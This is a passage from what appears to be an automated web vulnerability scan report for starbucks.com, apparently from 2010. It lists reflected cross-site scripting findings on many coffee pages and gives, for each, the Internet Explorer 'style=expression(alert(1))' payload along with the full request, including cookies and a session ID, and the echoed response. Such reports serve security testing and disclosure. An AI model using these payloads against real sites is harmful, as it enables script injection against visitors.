HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:51:31 GMT Connection: close Content-Length: 42269
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/> ...[SNIP]...
3.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:14 GMT Content-Length: 41929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/> ...[SNIP]...
3.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:54:14 GMT Connection: close Content-Length: 43000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/> ...[SNIP]...
3.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:54:45 GMT Connection: close Content-Length: 42842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/> ...[SNIP]...
3.20. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:49 GMT Connection: close Content-Length: 51777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/> ...[SNIP]...
3.21. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/flavored-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:37 GMT Content-Length: 53694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/> ...[SNIP]...
3.22. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:24 GMT Connection: close Content-Length: 53628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/> ...[SNIP]...
3.23. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:51:46 GMT Connection: close Content-Length: 54456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/> ...[SNIP]...
3.24. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/africa-arabia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:18 GMT Connection: close Content-Length: 41207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/> ...[SNIP]...
3.25. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/asia-pacific
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:23 GMT Connection: close Content-Length: 40730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/> ...[SNIP]...
3.26. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:32:57 GMT Connection: close Content-Length: 42564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/> ...[SNIP]...
3.27. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/latin-america
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:15 GMT Connection: close Content-Length: 44497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/> ...[SNIP]...
3.28. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/multi-region-blends
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:29 GMT Connection: close Content-Length: 44773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/> ...[SNIP]...
3.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:22 GMT Connection: close Content-Length: 41054
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/> ...[SNIP]...
3.30. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e95fa"style="x:expression(alert(1))"75289b27baf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse?e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:39:22 GMT Connection: close Content-Length: 51155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse?e95fa"style="x:expression(alert(1))"75289b27baf=1"/> ...[SNIP]...
3.31. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/community
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e306b"style="x:expression(alert(1))"0add0d892c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/community?e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:48:11 GMT Connection: close Content-Length: 41531
